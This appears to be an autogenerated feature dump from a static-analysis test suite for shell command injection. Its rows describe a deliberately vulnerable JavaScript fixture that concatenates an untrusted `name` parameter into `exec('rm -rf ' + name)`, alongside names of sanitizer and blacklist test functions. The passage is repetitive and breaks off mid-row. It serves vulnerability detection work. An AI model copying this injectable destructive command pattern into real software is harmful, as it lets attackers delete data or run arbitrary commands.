autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:27 | "rm -rf " | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:27 | "rm -rf " | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:27 | "rm -rf " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:27 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:27 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:34 | "rm -rf " + name | CalleeFlexibleAccessPath | MyThing.cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:34 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:34 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:34 | "rm -rf " + name | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:34 | "rm -rf " + name | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:34 | "rm -rf " + name | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:19:499:34 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:31:499:34 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:31:499:34 | name | contextSurroundingFunctionParameters | ()\n(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:31:499:34 | name | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:31:499:34 | name | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:31:499:34 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:31:499:34 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:7 | imp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:7 | imp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:7 | imp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:33 | imp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:33 | imp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:33 | imp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:33 | imp = r ... orted') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:33 | imp = r ... orted') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:5:504:33 | imp = r ... orted') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:17 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:17 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:33 | exceptional return of require ... orted') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:33 | exceptional return of require ... orted') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:33 | exceptional return of require ... orted') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:33 | require ... orted') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:33 | require ... orted') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:33 | require ... orted') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:19:504:32 | './isImported' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:19:504:32 | './isImported' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:19:504:32 | './isImported' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:19:504:32 | './isImported' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:19:504:32 | './isImported' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:19:504:32 | './isImported' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:10:505:13 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:18:505:20 | imp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:18:505:20 | imp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:505:18:505:20 | imp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:8 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:8 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:8 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:16 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:16 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:16 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:22 | module.exports[name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:22 | module.exports[name] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:22 | module.exports[name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:34 | module. ... p[name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:34 | module. ... p[name] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:3:506:34 | module. ... p[name] | fileImports | ./isImported 